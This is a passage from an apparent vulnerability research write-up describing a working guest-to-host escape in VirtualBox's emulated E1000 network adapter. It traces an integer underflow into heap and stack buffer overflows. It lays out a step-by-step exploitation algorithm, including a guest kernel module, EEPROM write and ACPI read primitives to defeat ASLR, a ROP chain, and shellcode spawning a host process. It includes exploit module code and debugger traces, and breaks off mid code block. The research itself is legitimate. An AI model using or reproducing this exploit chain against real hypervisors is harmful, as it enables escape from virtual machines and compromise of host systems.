        {
            ...
            if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
            {
                E1kLog2(("%s Empty data descriptor, skipped.\n", pThis->szPrf));
            }
            else
            {
                if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                {
                    ...
                }
                else if (!pDesc->data.cmd.fTSE)
                {
                    ...
                }
                else
                {
                    STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                    rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                }
            }
            ...

The first descriptor passed to e1kXmitDesc is context_1. The function does nothing with context descriptors.

The second descriptor passed to e1kXmitDesc is data_2. Since all of our data descriptors have tcp_segmentation_enable == true (pDesc->data.cmd.fTSE above), we call e1kFallbackAddToFrame, where the integer underflow will occur when data_5 is processed.

static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
    ...
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;

    /*
     * Carve out segments.
     */
    int rc = VINF_SUCCESS;
    do
    {
        /* Calculate how many bytes we have left in this TCP segment */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            /* This descriptor fits completely into current segment */
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
        else
        {
            ...
        }

        pDesc->data.u64BufAddr    += cb;
        pDesc->data.cmd.u20DTALEN -= cb;
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));

    if (pDesc->data.cmd.fEOP)
    {
        ...
        pThis->u16TxPktLen = 0;
        ...
    }

    return VINF_SUCCESS; /// @todo consider rc;
}

The most important variables here are u16MaxPktLen, pThis->u16TxPktLen, and pDesc->data.cmd.u20DTALEN.

Let’s draw a table where values of these variables are specified before and after execution of e1kFallbackAddToFrame function for the two data descriptors.

Tx Descriptor   Before/After   u16MaxPktLen   pThis->u16TxPktLen   pDesc->data.cmd.u20DTALEN
data_2          Before         0x3010         0                    0x10
data_2          After          0x3010         0x10                 0
data_3          Before         0x3010         0x10                 0
data_3          After          0x3010         0x10                 0

Note that when data_3 is processed, pThis->u16TxPktLen equals 0x10.

Next is the most important part. Please look again at the end of the snippet of e1kXmitPacket:

        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;

Since data_3 type != E1K_DTYP_CONTEXT and data_3.end_of_packet == true, we break out of the loop even though context_4 and data_5 are still waiting to be processed. Why is this important? The key to understanding the vulnerability is that all context descriptors are processed before data descriptors. Context descriptors are processed during the TCP Segmentation Context Update in e1kLocateTxPacket. Data descriptors are processed later, in the loop inside the e1kXmitPacket function. The developer’s intention was to forbid changing u16MaxPktLen after some data had been processed, to prevent integer underflows in this code:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;

But we are able to bypass this protection: recall that in e1kLocateTxPacket we forced the function to return because data_3.end_of_packet == true. As a result, two descriptors (context_4 and data_5) are still left to be processed while pThis->u16TxPktLen is 0x10, not 0. So we can change u16MaxPktLen through context_4.maximum_segment_size and cause the integer underflow.
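The bookkeeping described so far can be replayed with a small toy model. This is only a sketch: ToyDesc, ToyState, toy_process and toy_run_walkthrough are hypothetical names, not VirtualBox code, and context_1 is assumed to carry header length 0 and MSS 0x3010 so that the maximum packet length matches the 0x3010 in the table. Only the "descriptor fits completely" branch is modelled faithfully.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy descriptor: only the fields the walkthrough talks about. */
typedef struct {
    bool     is_context; /* context descriptor (sets MSS) or data descriptor */
    uint16_t hdr_len;    /* context: header_length */
    uint16_t mss;        /* context: maximum_segment_size */
    uint32_t data_len;   /* data: data_length */
    bool     eop;        /* data: end_of_packet */
} ToyDesc;

typedef struct {
    uint16_t max_pkt_len; /* models u16MaxPktLen (header + MSS) */
    uint16_t tx_pkt_len;  /* models pThis->u16TxPktLen */
} ToyState;

/* Process one descriptor. Returns the size that would be handed to
 * e1kFallbackAddSegment, or 0 if nothing is copied. */
uint32_t toy_process(ToyState *st, const ToyDesc *d)
{
    assert(st != NULL && d != NULL);
    if (d->is_context) {
        st->max_pkt_len = (uint16_t)(d->hdr_len + d->mss);
        return 0;
    }
    if (d->data_len == 0)
        return 0; /* empty data descriptor is skipped: tx_pkt_len is NOT reset */

    /* Same arithmetic as the vulnerable line; wraps if tx_pkt_len is larger. */
    uint32_t cb = (uint32_t)(st->max_pkt_len - st->tx_pkt_len);
    if (cb > d->data_len)
        cb = d->data_len;
    st->tx_pkt_len = d->eop ? 0 : (uint16_t)(st->tx_pkt_len + cb);
    return cb;
}

/* Replays the five descriptors and returns the size used for data_5. */
uint32_t toy_run_walkthrough(void)
{
    const ToyDesc chain[] = {
        { true,  0, 0x3010, 0,      false }, /* context_1 (assumed values) */
        { false, 0, 0,      0x10,   false }, /* data_2 */
        { false, 0, 0,      0,      true  }, /* data_3 */
        { true,  0, 0xF,    0,      false }, /* context_4 */
        { false, 0, 0,      0x4188, true  }, /* data_5 */
    };
    ToyState st = { 0, 0 };
    uint32_t last = 0;
    for (size_t i = 0; i < sizeof chain / sizeof chain[0]; i++)
        last = toy_process(&st, &chain[i]);
    return last;
}
```

In this model data_3 leaves tx_pkt_len at 0x10 because it is empty, context_4 then lowers the maximum to 0xF, and data_5 is accepted with its full length of 0x4188.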

[context_4, data_5] Processing

Now that the first three descriptors have been processed, we arrive again at the inner loop of e1kXmitPending:

            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

Here we call e1kLocateTxPacket to do the initial processing of the context_4 and data_5 descriptors. As mentioned, we can set context_4.maximum_segment_size to a value smaller than the size of the data already read, i.e. smaller than 0x10. Recall our input Tx descriptors:

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

As a result of the call to e1kLocateTxPacket, the maximum segment size equals 0xF, whereas the size of the data already read is 0x10.

Finally, when processing data_5, we arrive again at e1kFallbackAddToFrame with the following variable values:

Tx Descriptor   Before/After   u16MaxPktLen   pThis->u16TxPktLen   pDesc->data.cmd.u20DTALEN
data_5          Before         0xF            0x10                 0x4188
data_5          After

And therefore we have an integer underflow:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
=>
uint32_t cb = 0xF - 0x10 = 0xFFFFFFFF;

This makes the following check true, since 0xFFFFFFFF > 0x4188:

        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
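The wrap-around can be reproduced in isolation. The sketch below assumes a platform where int is wider than 16 bits (true for x86_64): both uint16_t operands are promoted to int, the difference becomes -1, and the conversion to uint32_t yields 0xFFFFFFFF. room_unchecked and room_checked are hypothetical helper names; the guarded variant is only an illustration of the missing check, not the upstream patch.

```c
#include <assert.h>
#include <stdint.h>

/* Same arithmetic as the vulnerable line. With int wider than 16 bits the
 * operands are promoted to int, so the difference can be negative, and the
 * conversion to uint32_t wraps it modulo 2^32. */
uint32_t room_unchecked(uint16_t max_pkt_len, uint16_t tx_pkt_len)
{
    return (uint32_t)(max_pkt_len - tx_pkt_len);
}

/* Hypothetical guarded variant: report zero room instead of wrapping. */
uint32_t room_checked(uint16_t max_pkt_len, uint16_t tx_pkt_len)
{
    if (tx_pkt_len >= max_pkt_len)
        return 0;
    uint32_t room = (uint32_t)(max_pkt_len - tx_pkt_len);
    assert(room <= max_pkt_len); /* guarded result never exceeds the segment size */
    return room;
}
```

With the values from the table, room_unchecked(0xF, 0x10) gives 0xFFFFFFFF, which passes the cb > u20DTALEN comparison, while room_checked(0xF, 0x10) gives 0.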

The e1kFallbackAddSegment function will be called with size 0x4188. Without the vulnerability it’s impossible to call e1kFallbackAddSegment with a size greater than 0x4000 because, during the TCP Segmentation Context Update in e1kUpdateTxContext, there is a check that the maximum segment size is less than or equal to 0x4000:

DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }
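The clamp quoted above can be sketched as a standalone function. One assumption needs flagging: the prose gives 0x4000 as the limit, while the device state structure shown later sizes aTxPacketFallback[E1K_MAX_TX_PKT_SIZE] at 0x3FA0; the sketch uses 0x3FA0 under the hypothetical name TOY_MAX_TX_PKT_SIZE. toy_clamp_mss is likewise a made-up name.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed value, taken from the stated size of aTxPacketFallback. */
#define TOY_MAX_TX_PKT_SIZE 0x3FA0u

/* Returns the MSS after the clamp: header + MSS + 4 (VLAN tag) must not
 * exceed the maximum packet size. */
uint16_t toy_clamp_mss(uint8_t hdr_len, uint16_t mss)
{
    uint32_t total = (uint32_t)mss + hdr_len + 4u;
    if (total > TOY_MAX_TX_PKT_SIZE)
        mss = (uint16_t)(TOY_MAX_TX_PKT_SIZE - hdr_len - 4u);
    assert((uint32_t)mss + hdr_len + 4u <= TOY_MAX_TX_PKT_SIZE);
    return mss;
}
```

Note that the clamp only bounds the value stored in the context. It does nothing about data that was already accumulated under a previous, larger MSS, which is exactly the gap the exploit uses.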

Buffer Overflow

We have called e1kFallbackAddSegment with size 0x4188. How can this be abused? I found at least two possibilities. First, data will be read from the guest into a heap buffer:

static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

Here pThis->aTxPacketFallback is a buffer of size 0x3FA0 and u16Len is 0x4188, an obvious overflow that can lead, for example, to overwriting function pointers.

Second, if we dig deeper we find that e1kFallbackAddSegment calls e1kTransmitFrame, which can, with a certain configuration of E1000 registers, call the e1kHandleRxPacket function. This function allocates a stack buffer of size 0x4000 and then copies data of a specified length (0x4188 in our case) into the buffer without any check:

static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
    uint8_t   rxPacket[E1K_MAX_RX_PKT_SIZE];
    ...
    if (status.fVP)
    {
        ...
    }
    else
        memcpy(rxPacket, pvBuf, cb);

As you see, we have turned an integer underflow into a classic stack buffer overflow. Both overflows above, heap and stack, are used in the exploit.
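To get a feel for the sizes involved, the amount written past each buffer can be computed from the numbers quoted in the text. This is plain arithmetic under those stated values (heap buffer 0x3FA0 with the copy starting at offset u16TxPktLen = 0x10, stack buffer 0x4000, copy length 0x4188); bytes_past_end is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>

/* Number of bytes written past the end of a buffer of `capacity` bytes when
 * `len` bytes are copied starting at `offset`. Returns 0 if the copy fits. */
size_t bytes_past_end(size_t capacity, size_t offset, size_t len)
{
    assert(offset <= capacity);
    size_t room = capacity - offset;
    return len > room ? len - room : 0;
}
```

For the heap case bytes_past_end(0x3FA0, 0x10, 0x4188) is 0x1F8, and for the stack case bytes_past_end(0x4000, 0, 0x4188) is 0x188.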

Exploit

The exploit is a Linux kernel module (LKM) to be loaded in a guest OS. The Windows case would require a driver that differs from the LKM only in its initialization wrapper and kernel API calls.

Elevated privileges are required to load a driver in both OSs. This is common and isn’t considered an insurmountable obstacle. Look at the Pwn2Own contest, where researchers use exploit chains: a browser that opened a malicious website in the guest OS is exploited, a browser sandbox escape is made to gain full ring 3 access, and an operating system vulnerability is exploited to pave the way to ring 0, where there is everything you need to attack a hypervisor from the guest OS. The most powerful hypervisor vulnerabilities are certainly those that can be exploited from guest ring 3. VirtualBox also has such code that is reachable without guest root privileges, and it’s mostly not audited yet.

The exploit is 100% reliable. That is, it either always works or never works, the latter because of mismatched binaries or other, more subtle reasons I didn’t account for. It works at least on Ubuntu 16.04 and 18.04 x86_64 guests with the default configuration.

Exploitation Algorithm

  1. An attacker unloads e1000.ko loaded by default in Linux guests and loads the exploit’s LKM.
  2. The LKM initializes E1000 according to the datasheet. Only the transmit half is initialized since there is no need for the receive half.
  3. Step 1: information leak.
    1. The LKM disables E1000 loopback mode to make the stack buffer overflow code unreachable.
    2. The LKM uses the integer underflow vulnerability to trigger the heap buffer overflow.
    3. The heap buffer overflow makes it possible to use the E1000 EEPROM to write any two bytes relative to a heap buffer within a 128 KB range. Hence the attacker gains a write primitive.
    4. The LKM uses the write primitive 8 times to write bytes to the ACPI (Advanced Configuration and Power Interface) data structure on the heap. The bytes are written to an index variable of a heap buffer from which a single byte will be read. Since the buffer size is smaller than the maximum index value (255), the attacker can read past the buffer and hence gains a read primitive.
    5. The LKM uses the read primitive 8 times to access ACPI and obtain 8 bytes from the heap. Those bytes are a pointer into the VBoxDD.so shared library.
    6. The LKM subtracts the RVA from the pointer to obtain the VBoxDD.so image base.
  4. Step 2: stack buffer overflow.
    1. The LKM enables E1000 loopback mode to make the stack buffer overflow code reachable.
    2. The LKM uses the integer underflow vulnerability to trigger the heap buffer overflow and the stack buffer overflow. The saved return address (RIP/EIP) is overwritten. The attacker gains control.
    3. A ROP chain is executed to run a shellcode loader.
  5. Step 3: shellcode.
    1. The shellcode loader copies the shellcode from the stack next to itself. The shellcode is executed.
    2. The shellcode performs fork and execve syscalls to spawn an arbitrary process on the host side.
    3. The parent process performs process continuation.
  6. The attacker unloads the LKM and loads e1000.ko back to allow the guest to use the network.

Initialization

The LKM maps the physical memory of the E1000 MMIO region. The physical address and size are predefined by the hypervisor.

void* map_mmio(void) {
    off_t pa = 0xF0000000;
    size_t len = 0x20000;

    void* va = ioremap(pa, len);
    if (!va) {
        printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
        return NULL;
    }

    return va;
}

Then the E1000 general-purpose registers are configured, Tx Ring memory is allocated, and the transmit registers are configured.

void e1000_init(void* mmio) {
    // Configure general purpose registers

    configure_CTRL(mmio);

    // Configure TX registers

    g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
    if (!g_tx_ring) {
        printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
        return;
    }

    configure_TDBAL(mmio);
    configure_TDBAH(mmio);
    configure_TDLEN(mmio);
    configure_TCTL(mmio);
}

ASLR Bypass

Write primitive

From the beginning of exploit development I decided not to use primitives found in services that are disabled by default. This means, first of all, the Chromium service (not the browser), which provides 3D acceleration and in which researchers found more than 40 vulnerabilities in the last year.

The problem was to find an information leak in the default VirtualBox subsystems. The obvious thought was that if the integer underflow lets us overflow the heap buffer, then we control everything past the buffer. We’ll see that not a single additional vulnerability was required: the integer underflow turned out to be powerful enough to derive read, write, and information leak primitives from it, not to mention the stack buffer overflow.

Let’s examine what exactly is overflowed on the heap.

/**
 * Device state structure.
 */
struct E1kState_st
{
...
    uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
    E1kEEPROM   eeprom;
...
}

Here aTxPacketFallback is a buffer of size 0x3FA0 which will be overflowed with bytes copied from a data descriptor. Searching for interesting fields after the buffer, I came to the E1kEEPROM structure, which contains another structure with the following fields (src/VBox/Devices/Network/DevE1000.cpp):

/**
 * 93C46-compatible EEPROM device emulation.
 */
struct EEPROM93C46
{
...
    bool m_fWriteEnabled;
    uint8_t Alignment1;
    uint16_t m_u16Word;
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;
    uint32_t m_u32InternalWires;
...
}

How can we abuse them? E1000 implements an EEPROM, a secondary adapter memory. The guest OS can access it via E1000 MMIO registers. The EEPROM is implemented as a finite automaton with several states and performs four actions. We are interested only in «write to memory». This is how it looks (src/VBox/Devices/Network/DevEEPROM.cpp):

EEPROM93C46::State EEPROM93C46::opWrite()
{
    storeWord(m_u16Addr, m_u16Word);
    return WAITING_CS_FALL;
}

void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
    if (m_fWriteEnabled) {
        E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
        m_au16Data[u32Addr] = u16Value;
    }
    m_u16Mask = DATA_MSB;
}

Here m_u16Addr, m_u16Word, and m_fWriteEnabled are fields of the EEPROM93C46 structure that we control. We can corrupt them in such a way that the

m_au16Data[u32Addr] = u16Value;

statement writes two bytes at an arbitrary 16-bit offset from m_au16Data, which also resides in the structure. We have found a write primitive.
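The reach of this primitive follows from the types involved: a 16-bit index into an array of 16-bit words covers 0x10000 words, i.e. 0x20000 bytes (128 KB) starting at m_au16Data. The helper below is a hypothetical sketch (toy_eeprom_index is not part of the exploit or of VirtualBox) that turns a byte distance into the word index to place in m_u16Addr; it assumes a little-endian host, as on x86_64.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* 16-bit index into a uint16_t array: 0x10000 words = 0x20000 bytes. */
#define TOY_EEPROM_REACH_BYTES (0x10000u * sizeof(uint16_t))

/* Convert a byte distance from m_au16Data into the word index for
 * m_u16Addr. Returns false if the target is out of reach. For an odd
 * distance the word starts one byte earlier and *high_byte is set, meaning
 * the target byte is the upper half of the little-endian word. */
bool toy_eeprom_index(uint32_t byte_distance, uint16_t *addr, bool *high_byte)
{
    assert(addr != NULL && high_byte != NULL);
    if (byte_distance >= TOY_EEPROM_REACH_BYTES)
        return false;
    *addr = (uint16_t)(byte_distance / 2u);
    *high_byte = (byte_distance % 2u) != 0;
    return true;
}
```

Because every store is two bytes wide, hitting a single-byte target always clobbers one neighbouring byte as well, which has to be tolerable for the chosen target.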

Read primitive

The next problem was to find data structures on the heap to write arbitrary data into, pursuing the main goal of leaking a shared library pointer to get its image base. Fortunately, there was no need for an unstable heap spray, because the virtual devices’ main data structures turned out to be allocated from an internal hypervisor heap in such a way that the distance between them is always constant, even though their virtual addresses are, of course, randomized by ASLR.

When a virtual machine is launched the PDM (Pluggable Device and Driver Manager) subsystem allocates PDMDEVINS objects in the hypervisor heap.

int pdmR3DevInit(PVM pVM)
{
...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...

I traced that code under GDB using a script and got these results:

[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8

[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8

...

[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0

[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848

[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728

[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570

[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90

[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30

Note the E1000 device at position #0xE. The second list shows that the following device is at offset 0x5700 from E1000, the next one is 0x19E0 further, and so on. As already said, these distances are always the same, and that is our exploitation opportunity.
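As a quick check on the trace, the distance from the E1000 instance to the ACPI instance can be computed directly. The two addresses are copied from the listing above and are only valid for that particular boot; instance_distance is a hypothetical helper.

```c
#include <assert.h>
#include <stdint.h>

/* Instance addresses copied from the trace above; they change per boot. */
#define TRACE_E1000_INSTANCE 0x7fc470083400ULL
#define TRACE_ACPI_INSTANCE  0x7fc47008be70ULL

/* Byte distance between two instances, with `to` expected at the higher address. */
uint64_t instance_distance(uint64_t from, uint64_t to)
{
    assert(to >= from);
    return to - from;
}
```

The result is 0x8A70, the sum of the three per-device steps 0x5700, 0x19E0 and 0x1990, and well below 0x20000. This is the distance between the instance headers; the offset between specific fields inside the two devices additionally depends on structure layouts not shown here.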

The devices following E1000 are ICH AC’97, OHCI, ACPI, and VirtualBox GIM. Studying their data structures, I figured out a way to use the write primitive.

On virtual machine boot up the ACPI device is created (src/VBox/Devices/PC/DevACPI.cpp):

typedef struct ACPIState
{
...
    uint8_t             au8SMBusBlkDat[32];
    uint8_t             u8SMBusBlkIdx;
    uint32_t            uPmTimeOld;
    uint32_t            uPmTimeA;
    uint32_t            uPmTimeB;
    uint32_t            Alignment5;
} ACPIState;

An ACPI port input/output handler is registered for 0x4100-0x410F range. In the case of 0x4107 port we have:

PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
    RT_NOREF1(pDevIns);
    ACPIState *pThis = (ACPIState *)pvUser;
...
    switch (off)
    {
...
        case SMBBLKDAT_OFF:
            *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
            pThis->u8SMBusBlkIdx++;
            pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
            break;
...

When the guest OS executes an INB(0x4107) instruction to read one byte from the port, the handler takes one byte from the au8SMBusBlkDat[32] array at index u8SMBusBlkIdx and returns it to the guest. And this is how to apply the write primitive: since the distance between virtual device heap blocks is constant, so is the distance from the EEPROM93C46.m_au16Data array to ACPIState.u8SMBusBlkIdx. By writing two bytes to ACPIState.u8SMBusBlkIdx we can read arbitrary data within 255 bytes of ACPIState.au8SMBusBlkDat.
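The handler logic can be modelled with a flat byte window to see what one out-of-range read does to the index. ToyAcpi and toy_smbus_read are hypothetical names; the 256-byte window stands for au8SMBusBlkDat plus whatever follows it in memory, so the model itself never reads out of bounds.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_BLKDAT_SIZE 32u

/* Flat model of the memory around ACPIState: the first 32 bytes stand for
 * au8SMBusBlkDat, the rest for whatever follows it. */
typedef struct {
    uint8_t mem[256]; /* a uint8_t index can never leave this window */
    uint8_t blk_idx;  /* models u8SMBusBlkIdx */
} ToyAcpi;

/* Mirrors the SMBBLKDAT_OFF case: read at the current index, then
 * increment and mask the index back into 0..31. */
uint8_t toy_smbus_read(ToyAcpi *acpi)
{
    assert(acpi != NULL);
    uint8_t value = acpi->mem[acpi->blk_idx];
    acpi->blk_idx++;
    acpi->blk_idx &= TOY_BLKDAT_SIZE - 1u;
    return value;
}
```

The read itself uses the unmasked index, and the mask is applied only afterwards. So after each out-of-range read the index falls back into 0..31 and has to be rewritten, which matches the exploit using the write primitive once per leaked byte.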

There is an obstacle. Looking at the ACPIState structure, we can see that the array is placed at the end of the structure. The remaining fields are useless to leak. So let’s look at what can be found after the structure:

gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0:	0xffffe98100000090	0xfffd9b2000000000
0x7fc47008d4f0:	0x00007fc470067a00	0x00007fc470067a00
0x7fc47008d500:	0x00000000a0028a00	0x00000000000e0000
0x7fc47008d510:	0x00000000000e0fff	0x0000000000001000
0x7fc47008d520:	0x000000ff00000002	0x0000100000000000
0x7fc47008d530:	0x00007fc47008c358	0x00007fc44d6ecdc6
0x7fc47008d540:	0x0031000035944000	0x00000000000002b8
0x7fc47008d550:	0x00280001d3878000	0x0000000000000000
gef➤  x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6:	"ACPI RSDP"
gef➤  vmmap VBoxDD.so
Start                           End                             Offset                          Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6

It seems there is a pointer to a string placed at a fixed offset from the VBoxDD.so image base. The pointer lies at offset 0x58 past the end of ACPIState. We can read that pointer byte by byte using the primitives and finally obtain the VBoxDD.so image base. We just have to hope that the data past the ACPIState structure is not random on each virtual machine boot. Fortunately, it isn’t; the pointer at offset 0x58 is always there.
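Turning eight leaked bytes into an image base is simple arithmetic, sketched below with the values from the gdb session. The RVA 0x1f9dc6 belongs to the author’s VBoxDD.so build and will differ for other builds; assemble_le64 and image_base are hypothetical helper names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* RVA of the "ACPI RSDP" string in the author's build (gdb output above). */
#define TRACE_LEAKED_RVA 0x1f9dc6ULL

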